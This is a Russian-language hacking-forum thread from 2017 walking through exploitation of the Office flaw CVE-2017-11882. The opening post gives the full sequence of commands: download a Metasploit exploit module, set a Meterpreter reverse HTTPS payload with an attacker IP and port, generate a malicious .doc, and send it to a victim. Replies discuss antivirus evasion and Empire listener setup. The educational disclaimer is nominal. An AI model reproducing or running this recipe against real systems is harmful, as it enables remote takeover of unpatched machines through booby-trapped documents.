HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.11.2017, 16:37
adm2
Новичок
Регистрация: 28.08.2008
Сообщений: 3
С нами: 9316533

Репутация: 1
По умолчанию

Добрый день.
Один доллар (@OneDollar)показал пример эксплуатации уязвимости через Empire Powershell

CVE-2017-11882 или Взлом с помощью безобидного документа


Мы рассмотрим альтернативный вариант через Metasploit:
Скачаем и перенесём експлоит

Код:


Код:
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb
cp office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
Запускаем metasploit и выбираем наш модуль.

Код:


Код:
service postgresql start
msfconsole
use exploit/windows/fileformat/office_ms17_11882
Просмотрим информацию о модуле

Код:


Код:
info


Из описания узнаём, что уязвимость существовала на протяжении 17 ЛЕТ! Шикарно, да? Представляете сколько ещё подобного рода CVE неизучено и неизвестно общественности?

Задаём путь, куда metasploit сгенерирует нам файл с нагрузкой

Код:


Код:
set FILENAME /root/exp.doc
Можно поставить и *.rtf, отработает и так и так.

Добавляем пейлоад и запускаем

Код:


Код:
set payload windows/meterpreter/reverse_https
set lhost 192.168.0.100 (адрес атакующего)
set lport 4443 (как обычно, можете выбирать почти любой)
exploit
Собственно, всё.
Берём файл, отправляем клиенту (себе на виртуалку, ибо в целях образовательных используем информацию мы).
Запускаем, ловим сессию.



AV так же не стоит на месте
https://nodistribute.com/result/BUZqx1mACKldLr3
На палевность можете даже и не смотреть ибо через месяц тут будет поголовно всё красное =)

Информация дана для ознакомления, спасибо за внимание)

Альтернативный вариант пост эксплуатации через Empire Powershell
CVE-2017-11882 или Взлом с помощью безобидного документа
 
Ответить с цитированием

  #2  
Старый 27.11.2017, 13:59
z3r0c10wn
Новичок
Регистрация: 04.09.2017
Сообщений: 0
С нами: 4573785

Репутация: 0
По умолчанию

Test - windows defender with last updates \ Windows Office unpatched -
Дефендер палит нагрузку но уже после выполнения через memory corruption. Соответственно сессию создаст. Хотя сделает вид что запалил.
 
Ответить с цитированием

  #3  
Старый 27.11.2017, 14:11
adm2
Новичок
Регистрация: 28.08.2008
Сообщений: 3
С нами: 9316533

Репутация: 1
По умолчанию

За всё время тестов любого ПО я понял, что сессия meterpreter странный предмет, вроде и создана, а вроде и нет =)
 
Ответить с цитированием

  #4  
Старый 27.11.2017, 14:15
z3r0c10wn
Новичок
Регистрация: 04.09.2017
Сообщений: 0
С нами: 4573785

Репутация: 0
По умолчанию

Цитата:

OneDollar сказал(а):

Хорошее дополнение, молодец что подметил!
[doublepost=1511776867,1511776833][/doublepost]
сессия создана будет, но не рабочая..

15 минут назад тестил - сессия работает! Офис не пропатчен, ломаный. Винда офф - дефендер с последними апдейтами.
Сессия активна.
 
Ответить с цитированием

  #5  
Старый 27.11.2017, 21:23
Vander
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами: 8170166

Репутация: 0
По умолчанию

Windows 8.1, Windows 10 - Все Last Update, дефендер уничтожает полезную нагрузку.
 
Ответить с цитированием

  #6  
Старый 28.11.2017, 08:09
adm2
Новичок
Регистрация: 28.08.2008
Сообщений: 3
С нами: 9316533

Репутация: 1
По умолчанию

Цитата:

Vander сказал(а):

Windows 8.1, Windows 10 - Все Last Update, дефендер уничтожает полезную нагрузку.

и это печально)
 
Ответить с цитированием

  #7  
Старый 28.11.2017, 14:16
adm2
Новичок
Регистрация: 28.08.2008
Сообщений: 3
С нами: 9316533

Репутация: 1
По умолчанию

Цитата:

TST сказал(а):

У кого встречалась траблы с Empire, когда выполняешь execute:
[!] Invalid listener ID or name.
Как ее обойти либо решить?
Она у тебя просит поднятый листенер)
Выходишь в основное меню

Код:


Код:
main
listeners
uselistener http
execute
А потом уже возвращается в стейджер

 
Ответить с цитированием

  #8  
Старый 29.11.2017, 21:07
ivanov-sv-2015
Новичок
Регистрация: 27.01.2017
Сообщений: 0
С нами: 4890679

Репутация: 0
По умолчанию

При добавлении текста в документ сессия не поднимается. Office 2013. Кто-нибудь сталкивался?
 
Ответить с цитированием

  #9  
Старый 29.11.2017, 21:28
adm2
Новичок
Регистрация: 28.08.2008
Сообщений: 3
С нами: 9316533

Репутация: 1
По умолчанию

Цитата:

ivanov-sv-2015 сказал(а):

При добавлении текста в документ сессия не поднимается. Office 2013. Кто-нибудь сталкивался?

Пха-ха) а о внесении изменений в документ я и не задумывался)) действительно сессия не прилетает)
ну ничего) пройдёт неделька, другая обязательно появится решение)
 
Ответить с цитированием

  #10  
Старый 29.11.2017, 21:28
ivanov-sv-2015
Новичок
Регистрация: 27.01.2017
Сообщений: 0
С нами: 4890679

Репутация: 0
По умолчанию

Цитата:

OneDollar сказал(а):

скажешь потом что перепутал

Точно!
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.